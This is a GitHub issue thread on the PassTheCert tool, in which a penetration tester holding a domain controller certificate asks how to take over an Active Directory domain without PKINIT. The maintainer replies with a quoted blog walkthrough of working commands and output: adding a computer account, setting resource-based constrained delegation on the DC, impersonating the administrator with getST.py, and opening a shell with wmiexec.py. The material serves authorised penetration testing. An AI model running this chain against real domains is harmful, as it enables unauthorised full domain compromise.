### ISSUE TITLE
Abuse with Domain Controller pfx

### ISSUE THREAD

**Issue by Barneee** [AlmondOffSec/PassTheCert#22]
Hi,
I'm currently in a pentest and ran into the situation where I received the error message "KDC-ERR_PDATA_TYPE-NOSUPP" and came over your tool. However, I received a certificate for a domain controller with the ESC8 vulnerability. Normally I would now use the secretsdump tool to carry out a DcSync attack, which is not possible due to the lack of PKINIT. Is there another way I can take over the domain with the DomainController Computer Account permissions or is it a dead end? I could not find any command which helps me further. Or is some other tool out there for this special scenario?

Many thanks in advance, as the tool had already helped me with fully abusing ADCS ESC1.

Greets,
Barne

**Comment by the-useless-one** [comment]
Hi @Barneee,

Here's an example taken from [our blog post presenting PassTheCert](https://offsec.almond.consulting/authenticating-with-certificates-when-pkinit-is-not-supported.html):

> Now, let's say you're in a situation similar to my own: you have the certificate to a Domain Controller but there's no PKINIT. You can start by creating a new computer in the domain:
> 
> ```
> PS C:\> .\PassTheCert.exe --server ad1.contoso.com --cert-path Z:\ad2.pfx --add-computer --computer-name DESKTOP-1337$
> No password given, generating random one.
> Generated password: Q2cpNOMhwlU2yZQBPAbJ1YY9M9XJIfBc
> Success
> ```
> 
> Now that you have a computer you control, defined with SPNs and all, you can add its SID to your Domain Controller's msDS-AllowedToActOnBehalfOfOtherIdentity attribute:
> 
> ```
> PS C:\> .\PassTheCert.exe --server ad1.contoso.com --cert-path Z:\ad2.pfx --rbcd --target "CN=AD2,OU=Domain Controllers,DC=contoso,DC=com" --sid "S-1-5-21-863927164-4106933278-53377030-3122"
> msDS-AllowedToActOnBehalfOfOtherIdentity attribute is empty
> You can clear it using arguments:
>         --target "CN=AD2,OU=Domain Controllers,DC=contoso,DC=com" --restore clear
> Success
> ```
> 
> Now that it's done, you can go back to your trusty impacket to perform an RBCD attack, and impersonate the domain administrator on your DC:
> 
> ```
> $ getST.py -spn 'cifs/ad2.contoso.com' -impersonate Administrateur 'contoso.com/desktop-1337$:Q2cpNOMhwlU2yZQBPAbJ1YY9M9XJIfBc'
> Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation
> 
> [*] Getting TGT for user
> [*] Impersonating Administrateur
> [*]         Requesting S4U2self
> [*]         Requesting S4U2Proxy
> [*] Saving ticket in Administrateur.ccache
> $ export KRB5CCNAME=Administrateur.ccache
> $ wmiexec.py -k -no-pass contoso.com/Administrateur@ad2.contoso.com
> Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation
> 
> [*] SMBv3.0 dialect used
> [!] Launching semi-interactive shell - Careful what you execute
> [!] Press help for extra shell commands
> C:\>whoami
> contoso\administrateur
> ```

Hope this helps, cheers!

Y

**Comment by Barneee** [comment]
@the-useless-one perfect it worked. Thank you so much ;)
